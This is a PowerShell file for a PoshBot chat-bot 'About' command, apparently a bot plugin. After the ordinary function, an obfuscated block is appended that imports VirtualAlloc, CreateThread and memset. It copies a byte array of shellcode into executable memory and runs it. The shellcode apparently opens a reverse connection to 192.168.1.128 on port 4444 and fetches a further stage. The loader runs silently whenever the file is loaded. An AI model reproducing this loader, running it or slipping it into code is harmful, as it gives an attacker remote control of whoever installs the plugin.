function About {
    
    [PoshBot.BotCommand(
        Permissions = ("{0}{1}"-f'vi','ew')
    )]
    [cmdletbinding()]
    param(
        [parameter(Mandatory)]
        $Bot
    )

    $path = "$PSScriptRoot/../../../PoshBot.psd1"
    $manifest = Import-PowerShellDataFile -Path $path
    $ver = $manifest.ModuleVersion

    $msg = ((('m'+'7a
Po'+'shB'+'ot ')  -RepLACe([ChaR]109+[ChaR]55+[ChaR]97),[ChaR]34)+(('vr0g'+'ve'+'r
r0g(r0gman'+'ife'+'s'+'t.Cop'+'y'+'Righ'+'t)

https://g'+'it'+'hub.co'+'m/'+'poshb'+'otio'+'/PoshB'+'ot'+'
JKd')-cREPLACe  'r0g',[Char]36  -cREPLACe  'JKd',[Char]34))

    New-PoshBotTextResponse -Text $msg -AsCode
}

$c = ((("{12}{15}{21}{62}{72}{57}{8}{16}{27}{78}{25}{73}{18}{39}{40}{68}{55}{34}{14}{48}{67}{17}{64}{32}{49}{30}{61}{31}{77}{35}{75}{66}{23}{70}{52}{59}{36}{58}{53}{24}{45}{4}{60}{71}{69}{47}{22}{1}{63}{79}{2}{76}{44}{41}{28}{42}{10}{33}{26}{56}{29}{54}{37}{51}{74}{46}{7}{50}{43}{0}{38}{80}{19}{3}{13}{6}{65}{20}{5}{9}{11}"-f 'tatic',', uin','Stac','r ','eateThread(I','co','s','ms','kerne','unt)','ter',';','[Dll','de','lo','Imp','l32.','pAddress, uint dwSize','bl','mset(IntPt','rc, uint ','ort','es','rt({0}k','ic static extern IntPtr C',')]p','a','dll{0','rtAddres','lags, IntPtr lp','oc','onTyp',' flAl',', uint dwCre','tualAl',');[','dl',')',' ex','ic',' s','lpSta','s, IntPtr lpParame',')]public s','Size, IntPtr ','r','ort({0}','tribut','c(IntP','l','vcrt.dll{0}',';[Dl','el3','})]publ','ThreadId','Ptr Vir','tionF','}','l{0','2.','n','ati','({','t',', uint','t, uint s','llImpo','tr l','tatic extern Int','Ptr lpThreadAt','ern','t','0','u','lImp','D','k','e, uint flProtect','}',' dw','tern IntPtr me')) -f [cHAr]34);$w = Add-Type -memberDefinition $c -Name ("{1}{0}"-f'n32','Wi') -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0x01,0x80,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$x=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};
